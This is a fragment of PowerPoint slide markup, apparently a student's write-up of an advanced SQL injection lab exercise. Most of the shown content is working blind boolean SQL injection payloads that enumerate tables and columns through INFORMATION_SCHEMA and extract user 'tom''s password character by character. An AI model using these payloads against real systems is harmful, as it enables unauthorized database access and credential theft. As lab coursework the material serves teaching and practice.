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415f3e6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415f3e6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415f3e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415f3e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b415f3e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b415f3e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b415f3e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b415f3e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143000"/>
            <a:ext cx="53613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70926"/>
            <a:ext cx="53613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 Advanced - 5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Akhilesh Gowda Mandya Ramesh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: amandyar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Gather the  total number and names of all tables by looping the tables according to how many there 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Manually suspect which table is vulnerable, which might provide the password for username or userid ‘tom’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suspected table get the column length and names to try and find if there is user id and password field by querying.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the Password field is present for the user id then query the table to get the password for the user tom.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used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44444"/>
              <a:buAutoNum type="arabicPeriod"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tom' and (select count(*) from INFORMATION_SCHEMA.tables)="+str(count)+"-- (to get number of tables)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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22222"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"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username="tom' and (select substring(table_name,"+str(j+1)+",1) from (select table_name from INFORMATION_SCHEMA.tables limit 1 offset "+str(i)+"))='"+str(alphabets[iter]) (to get the names of the table)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22222"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"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username="tom' and (select length(column_name) from (select column_name from INFORMATION_SCHEMA.columns where table_name='CHALLENGE_USERS' limit 1 offset "+str(i)+"))="+str(length)+"--" (to get the length of the columns)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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22222"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"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username="tom' and (select substring(column_name,"+str(j+1)+",1) from (select column_name from INFORMATION_SCHEMA.columns where table_name='CHALLENGE_USERS' limit 1 offset "+str(i)+"))='"+str(alphabets[iter]) (to get the names of the columns)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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22222"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"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username="tom' and (select length(PASSWORD) from CHALLENGE_USERS where USERID='tom')="+str(password_length)+"--"</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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(To get the length of the password)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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22222"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="22222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username="tom' and (select substring(PASSWORD,"+str(j+1)+",1) from CHALLENGE_USERS WHERE USERID='tom')='"+str(alphabets[iter]) (TO get the password)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="22222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 run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Manually picking vulnerable field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Manually suspecting a table name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